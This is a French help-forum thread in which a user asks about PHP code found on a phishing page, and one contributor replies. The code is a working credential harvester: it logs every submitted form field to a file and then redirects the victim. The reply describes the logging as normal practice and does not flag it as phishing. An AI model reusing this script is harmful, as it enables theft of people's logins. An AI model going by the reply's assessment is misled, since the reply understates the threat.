Code trouvé dans une page phishing

Résolu/Fermé

Utilisateur anonyme - 10 juin 2012 à 22:43
fiddy Messages postés 11069 Date d'inscription samedi 5 mai 2007 Statut Contributeur Dernière intervention 23 avril 2022 - 10 juin 2012 à 23:47

Bonjour,

J'ai trouvé un code PHP sur une page de phishing. Je m'en suis rendu compte après avoir cliqué sur connexion. J'aimerais savoir a quoi ce code sert-il, si il permet d'avoir mon pseudo, MDP, mail,.. Merci !

<?php
header (' Location: https://www.google.fr/?gws_rd=ssl ');
$handle = fopen("logs.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

A voir également:

Code trouvé dans une page phishing
Supprimer une page word - Guide
Traduire une page web - Guide
Créer une page facebook - Guide
Code asci - Guide
Code puk bloqué - Guide

1 réponse

Réponse 1 / 1

fiddy Messages postés 11069 Date d'inscription samedi 5 mai 2007 Statut Contributeur Dernière intervention 23 avril 2022 1 835
10 juin 2012 à 23:47

Bonjour,
Je me demande déjà comment tu as pu avoir le code source php ? oO.
Sinon ce code sauvegarde les variables post dans le fichier logs.txt.
Seule un administrateur du site pourra lire ce fichier (sauf si bien sûr les droits du fichier sont publics dans un répertoire accessible et s'il n'y a pas eu de compromission du site).
En tout cas, c'est une pratique normal de loguer les données. Sauf le stockage en clair du mot de passe. Il faut toujours hacher avec un sel.

Discussions similaires

[référencement] Ne pas être référencé

Code de renvoi d'appel : Ooredo, Mobilis...

Trouver un nom avec une adresse

Discussions similaires

Newsletters